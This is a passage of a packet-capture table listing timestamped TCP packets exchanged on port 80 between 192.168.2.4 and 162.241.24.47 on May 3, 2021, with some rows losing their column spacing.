May 3, 2021 19:48:16.266565084 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448357105 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448482037 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448487043 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448508978 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448534012 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448544025 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448551893 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448558092 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448576927 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448581934 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448596954 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448609114 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448627949 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448633909 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448653936 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448657990 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448681116 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448682070 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448695898 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448708057 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448726892 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448731899 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448755980 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448755980 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448770046 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448780060 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448801041 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448803902 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448826075 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448829889 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448846102 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448853970 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448875904 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448877096 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448899031 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448900938 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448920965 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448925018 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448939085 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448947906 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.448956013 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.448967934 CEST  49740        80         192.168.2.4    162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.448976040 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.448992014 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.448995113 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.449011087 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.449012041 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.449027061 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.449038982 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.449039936 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.449059010 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.449074984 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.449076891 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.449090004 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.449091911 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.449106932 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.449122906 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.449124098 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.449145079 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.449157000 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.449162960 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.449179888 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.449181080 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.449197054 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.449209929 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.449224949 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.449229956 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.449248075 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.449259043 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.449264050 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.449278116 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.449309111 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627260923 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627332926 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627360106 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627386093 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627384901 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627413988 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627417088 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627424002 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627439022 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627450943 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627460957 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627473116 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627480030 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627496004 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627497911 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627513885 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627517939 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627526045 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627542019 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627542973 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627556086 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627557993 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627571106 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627593040 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627604961 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627616882 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627623081 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627629995 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627644062 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627655983 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627671957 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627679110 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627685070 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627691984 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627698898 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627717972 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627737045 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627736092 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627758026 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627763033 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627765894 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627789974 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627790928 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627813101 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627835035 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627836943 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627849102 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627861977 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627870083 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627887011 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627904892 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627912998 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627918005 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627938986 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627954006 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627963066 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.627974033 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627985954 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.627985954 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628005981 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628022909 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628025055 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.628035069 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628041029 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.628047943 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628062010 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628067970 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.628083944 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628099918 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628113031 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628120899 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.628124952 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628139019 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628142118 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.628150940 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628164053 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628176928 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628176928 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.628189087 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628202915 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628215075 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628216028 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.628231049 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628248930 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.628252029 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.628267050 CEST8049740162.241.24.47192.168.2.4
Timestamp                            Src Port  Dst Port  Src IP         Dst IP
May 3, 2021 19:48:16.628268957 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.628293991 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628298044 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.628318071 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628344059 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.628375053 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628384113 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.628400087 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628424883 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628441095 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.628448963 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628473997 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628489017 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.628494978 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628505945 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.628520012 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628546000 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628551006 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.628570080 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628587008 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628592968 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.628599882 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628612995 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628624916 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628635883 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628635883 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.628648996 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628664970 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628664017 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.628700018 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628710032 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.628724098 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628724098 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.628757954 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.628777027 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628799915 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628817081 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.628823042 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628848076 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628855944 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.628866911 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628886938 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.628899097 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.628920078 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.628968954 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.810467958 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.810583115 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.810633898 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.810683966 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.810718060 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.810736895 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.810744047 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.810758114 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.810806990 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.810806990 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.810816050 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.810852051 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.810889959 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.810930014 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.810930014 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.810970068 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811000109 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811008930 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811009884 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811045885 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811047077 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811072111 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811088085 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811095953 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811136961 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811146975 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811180115 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811197042 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811218977 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811238050 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811258078 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811289072 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811296940 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811314106 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811336994 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811376095 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811427116 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811425924 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811439991 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811456919 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811482906 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811485052 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811532021 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811549902 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811585903 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811611891 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811646938 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811650991 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811700106 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811722994 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811753988 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811763048 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811815023 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811834097 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811867952 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811875105 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811908007 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811944962 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.811964989 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811975956 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811991930 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.811999083 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.812058926 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.812062979 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.812117100 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.812119961 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.812171936 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.812175035 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.812233925 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.812237024 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.812295914 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.812299967 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.812347889 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.812354088 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.812400103 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.812405109 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.812458038 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.812463999 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.812516928 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.812522888 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.812580109 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.812587023 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.812635899 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.812637091 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.812690973 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.812711954 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.812747002 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.812766075 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.812803030 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.812822104 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.812859058 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.812863111 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.812920094 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.812921047 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.812988043 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.813009977 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.813046932 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.813055038 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.813086033 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.813108921 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.813122988 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.813141108 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.813163996 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.813179970 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.813201904 CEST  80        49740     162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.813218117 CEST  49740     80        192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.813240051 CEST  80        49740     162.241.24.47  192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.813257933 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.813278913 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.813297033 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.813327074 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.813333988 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.813369989 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.813388109 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.813431025 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.813467979 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.813509941 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.813527107 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.813548088 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.813564062 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.813586950 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.813611031 CEST4974080192.168.2.4162.241.24.47
